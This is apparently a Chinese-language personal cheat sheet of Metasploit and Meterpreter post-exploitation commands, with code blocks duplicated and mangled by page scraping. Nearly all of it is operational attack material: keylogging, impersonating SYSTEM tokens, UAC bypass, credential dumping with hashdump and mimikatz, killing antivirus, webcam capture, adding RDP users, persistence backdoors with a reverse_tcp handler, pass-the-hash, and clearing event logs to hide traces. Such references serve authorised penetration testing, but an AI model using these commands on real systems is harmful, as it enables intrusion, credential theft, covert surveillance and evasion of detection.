自用的msf命令總結

msf基礎命令

解決msfshell亂碼

chcp 65001

<code>
















 





1chcp 65001


/<code>


加載模塊 use name 查看網絡配置 ifconfig 獲取進程列表 ps 查看所有exploit show exploits 查看所有payload show payloads 查看所有auxiliary show auxiliary 展示模塊詳細信息 info 查找模塊 search name 查看當前運行的模塊 jobs 重啟目標機器 reboot 關閉目標機器 shutdown 獲取交互shell shell 當前meterpreter到後臺 background 離開msf quit

<code>












x



 



1加載模塊 


2use name


3


4查看網絡配置 


5ifconfig


6


7獲取進程列表 


8ps


9


10查看所有exploit 


11show exploits


12


13查看所有payload 




14show payloads


15


16查看所有auxiliary 


17show auxiliary


18


19展示模塊詳細信息 


20info


21


22查找模塊 


23search name


24


25查看當前運行的模塊 


26jobs


27


28重啟目標機器 


29reboot


30


31關閉目標機器 


32shutdown


33


34獲取交互shell 


35shell


36


37當前meterpreter到後臺 


38background


39


40離開msf 


41quit


/<code>


msf後滲透模塊

基本功能

(1)系統信息獲取

(2)密碼哈希導出

(3)文件上傳下載

(4)屏幕截取

(5)鍵盤記錄

(6)權限提升

(7)跳板攻擊

(8)反追蹤

優點: 純內存工作模式,執行漏洞滲透攻擊的時候會直接裝載meterpreter的 動態鏈接庫到目標進程的空間中,使得meterpreter啟動隱蔽,很難被殺毒軟 件檢測到;


一、後滲透基本操作

1.基本命令


background # 讓meterpreter處於後臺模式 sessions -i index # 與會話進行交互,index表示第一個session quit # 退出會話 shell # 獲得控制檯權限 irb # 開啟ruby終端 2.文件操作命令 cat # 查看文件內容 getwd # 查看當前工作目錄 upload # 上傳文件到目標機上 download # 下載文件到本機上

<code>














19



 





1background # 讓meterpreter處於後臺模式


2


3sessions -i index # 與會話進行交互,index表示第一個session


4


5quit # 退出會話


6


7shell # 獲得控制檯權限


8


9irb # 開啟ruby終端


10


112.文件操作命令


12


13cat # 查看文件內容


14


15getwd # 查看當前工作目錄


16


17upload # 上傳文件到目標機上


18


19download # 下載文件到本機上


/<code>


來源: https://cloud.tencent.com/developer/article/1472206

端口轉發

portfwd add -l 6666 -p 3389 -r 127.0.0.1

設置Socks代理

Socks4a代理

use auxiliary/server/socks4a set srvhost 127.0.0.1 set srvport 1080 run

<code>














4



 





1use auxiliary/server/socks4a


2set srvhost 127.0.0.1


3set srvport 1080


4run


/<code>

Socks5代理

use auxiliary/server/socks5 set USERNAME root set PASSWORD Password@ run

<code>














4



 





1use auxiliary/server/socks5


2set USERNAME root


3set PASSWORD Password@


4run


/<code>

添加路由

獲取網段信息 run get_local_subnets 查看幫助 run autoroute –h 添加到目標環境網絡 run autoroute -s 192.168.0.1/24 打印添加的路由 run autoroute –p 刪除路由 run autoroute -d -s 192.168.0.1/24

<code>
















 





1獲取網段信息 


2run get_local_subnets


3


4查看幫助 


5run autoroute –h


6


7添加到目標環境網絡 


8run autoroute -s 192.168.0.1/24


9


10打印添加的路由 


11run autoroute –p


12


13刪除路由 


14run autoroute -d -s 192.168.0.1/24


/<code>


execute執行文件

在目標機中執行文件 execute

創建新進程cmd.exe,-H不可見,-i交互 execute -H -i -f cmd.exe

-f:指定可執行文件 -H:創建一個隱藏進程 -a:傳遞給命令的參數 -i:跟進程進行交互 -m:從內存中執行 -t: 使用當前偽造的線程令牌運行進程 -s: 在給定會話中執行進程

<code>














13



 





1-f:指定可執行文件


2


3-H:創建一個隱藏進程


4


5-a:傳遞給命令的參數


6


7-i:跟進程進行交互


8


9-m:從內存中執行


10


11-t: 使用當前偽造的線程令牌運行進程


12


13-s: 在給定會話中執行進程


/<code>

migrate轉移進程

獲取當前進程PID getpid 獲取進程列表 ps 轉移進程 migrate PID 殺死進程 kill PID 自動進程遷移 run post/windows/manage/migrate 監聽設置自動轉移進程 set autorunscript migrate -f

<code>
















 





1獲取當前進程PID 


2getpid


3


4獲取進程列表 


5ps


6


7轉移進程 


8migrate PID


9


10殺死進程 


11kill PID


12


13自動進程遷移 


14run post/windows/manage/migrate


15


16監聽設置自動轉移進程 


17set autorunscript migrate -f


/<code>


令牌竊取

使用模塊 use incognito 查看可用token list_tokens -u 假冒SYSTEM權限 impersonate_token 'NT AUTHORITY\SYSTEM' 利用假冒身份執行命令 execute -f cmd.exe -i –t 或者直接shell即可 返回原始權限 rev2self

<code>












x



 





1使用模塊 


2use incognito


3


4查看可用token 


5list_tokens -u


6


7假冒SYSTEM權限 


8impersonate_token 'NT AUTHORITY\SYSTEM'


9


10利用假冒身份執行命令 


11execute -f cmd.exe -i –t 


12或者直接shell即可


13


14返回原始權限 


15rev2self


/<code>


提權相關

加載特權提升擴展模塊 use priv 獲取更多的特權 getprivs 查看補丁信息 run post/windows/gather/enum_patches 可利用exp提權檢測 use post/multi/recon/local_exploit_suggester 系統服務權限配置錯誤 use exploit/windows/local/service_permissions 註冊表鍵配置錯誤提取 use exploit/windows/local/always_install_elevated 可信任服務路徑 use exploit/windows/local/trusted_service_path

<code>
















 





1加載特權提升擴展模塊 


2use priv


3


4獲取更多的特權 


5getprivs


6


7查看補丁信息 


8run post/windows/gather/enum_patches


9


10可利用exp提權檢測 


11use post/multi/recon/local_exploit_suggester


12


13系統服務權限配置錯誤 


14use exploit/windows/local/service_permissions


15


16註冊表鍵配置錯誤提取 


17use exploit/windows/local/always_install_elevated


18


19可信任服務路徑 


20use exploit/windows/local/trusted_service_path


/<code>


bypassuac

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection

use windows/local/bypassuac_vbs

use windows/local/ask

鍵盤鼠標設置

禁用鼠標 uictl disable mouse

禁用鍵盤 uictl disable keyboard

啟用鼠標 uictl enable mouse

啟用鍵盤 uictl enable keyboard

鍵盤記錄

開始鍵盤記錄 keyscan_start 導出記錄數據 keyscan_dump 結束鍵盤記錄 keyscan_stop

<code>














8



 





1開始鍵盤記錄


2keyscan_start


3


4導出記錄數據


5keyscan_dump


6


7結束鍵盤記錄


8keyscan_stop


/<code>

信息蒐集

查看當前目錄 pwd getwd 查看目標主機信息 sysinfo 檢查目標機器閒置時間 idletime 獲取代理信息 getproxy 查看目標主機是否運行在虛擬機上 run checkvm run post/windows/gather/checkvm 獲取主機安裝軟件、補丁 run post/windows/gather/enum_applications run post/windows/gather/enum_patches #補丁信息 獲取目標主機環境變量 run post/multi/gather/env 獲取IE緩存 run post/windows/gather/enum_ie 獲取Chrome緩存 run post/windows/gather/enum_chrome 獲取Firefox緩存 run post/windows/gather/enum_firefox 列舉當前登錄的用戶 run post/windows/gather/enum_logged_on_users 查找域控 run post/windows/gather/enum_domain Windows憑證搜索 run post/windows/gather/enum_unattend 獲取辦公文檔 run post/windows/gather/dumplinks 獲取目標常見信息並保存到本地 run scraper 屏幕截圖 screenshot

<code>
















 





1查看當前目錄 


2pwd 


3getwd


4


5查看目標主機信息 


6sysinfo


7


8檢查目標機器閒置時間 


9idletime


10


11獲取代理信息 


12getproxy


13


14查看目標主機是否運行在虛擬機上 


15run checkvm 


16run post/windows/gather/checkvm


17


18獲取主機安裝軟件、補丁 


19run post/windows/gather/enum_applications


20run post/windows/gather/enum_patches #補丁信息


21


22獲取目標主機環境變量 


23run post/multi/gather/env


24


25獲取IE緩存 


26run post/windows/gather/enum_ie


27


28獲取Chrome緩存 


29run post/windows/gather/enum_chrome


30


31獲取Firefox緩存 


32run post/windows/gather/enum_firefox


33


34列舉當前登錄的用戶 


35run post/windows/gather/enum_logged_on_users


36


37查找域控 


38run post/windows/gather/enum_domain


39


40Windows憑證搜索 


41run post/windows/gather/enum_unattend


42


43獲取辦公文檔 


44run post/windows/gather/dumplinks


45


46獲取目標常見信息並保存到本地 


47run scraper


48


49屏幕截圖 


50screenshot


/<code>


密碼獲取

抓取自動登錄的用戶名和密碼 run post/windows/gather/credentials/windows_autologin

hashdump run post/windows/gather/smart_hashdump

mimikatz

加載 load mimikatz

獲取hash值 msv

獲取明文 Kerberos

獲取系統賬戶信息 wdigest


<code>


mimikatz_command -f samdump::hashes #執行mimikatz原始命令 mimikatz_command -f sekurlsa::searchPasswords

<code>
















 





1mimikatz_command -f samdump::hashes #執行mimikatz原始命令 


2mimikatz_command -f sekurlsa::searchPasswords


/<code>


meterpreter > load mimikatz #加載mimikatz meterpreter > msv #獲取hash值 meterpreter > Kerberos #獲取明文 meterpreter > ssp #獲取明文信息 meterpreter > wdigest #獲取系統賬戶信息 meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示 meterpreter > mimikatz_command -f hash:: #獲取目標 hash meterpreter > mimikatz_command -f samdump::hashes meterpreter > mimikatz_command -f sekurlsa::searchPasswords

<code>












x



 





1meterpreter > load mimikatz #加載mimikatz


2


3meterpreter > msv #獲取hash值


4


5meterpreter > Kerberos #獲取明文


6


7meterpreter > ssp #獲取明文信息


8


9meterpreter > wdigest #獲取系統賬戶信息


10


11meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示


12


13meterpreter > mimikatz_command -f hash:: #獲取目標 hash


14


15meterpreter > mimikatz_command -f samdump::hashes


16


17meterpreter > mimikatz_command -f sekurlsa::searchPasswords


/<code>


流量抓取

查看網卡信息 run packetrecorder -L

查看流量 run packetrecorder -i

端口掃描、主機發現

使用arp發現主機 run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24

掃描tcp端口 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

防火牆、殺軟

關閉殺軟 run killav

查看防火牆狀態 run getcountermeasure

在shell中使用 netsh firewall show opmode

<code>














2



 





1在shell中使用


2netsh firewall show opmode


/<code>

Hash傳遞

use exploit/windows/smb/psexec


攝像頭、屏幕

查看攝像頭信息 webcam_list

使用攝像頭拍照 webcam_snap

屏幕監視 run vnc

開啟遠程桌面

開啟遠程桌面 run post/windows/manage/enable_rdp

添加用戶 run post/windows/manage/enable_rdp USERNAME=gugugu PASSWORD=Root123456789

將3389端口轉發到6662端口 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

cmdshell升級

查看全部會話 sessions

選擇會話1 sessions 1

升級meterpreter sessions -u 會話id

持久化控制後門

run persistence -X -i 50 -p 4444 -r 192.168.1.7

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.109.137 set LPORT 4444 exploit

<code>














5



 





1use exploit/multi/handler


2set payload windows/meterpreter/reverse_tcp


3set LHOST 192.168.109.137


4set LPORT 4444


5exploit


/<code>

run metsvc

針對linux平臺

目標主機保存的ssh身份驗證信息 run post/multi/gather/ssh_creds

擦屁股、清痕跡

刪除添加的賬號 C:\Windows\system32> net user 添加的用戶名 /del

刪除日誌 clearev

關閉所有session連接 sessions -K

事件日誌

查看事件日誌 run event_manager -i 清除事件日誌 run event_manager -c

<code>














5



 





1查看事件日誌


2run event_manager -i


3


4清除事件日誌


5run event_manager -c


/<code>


分享到:


相關文章: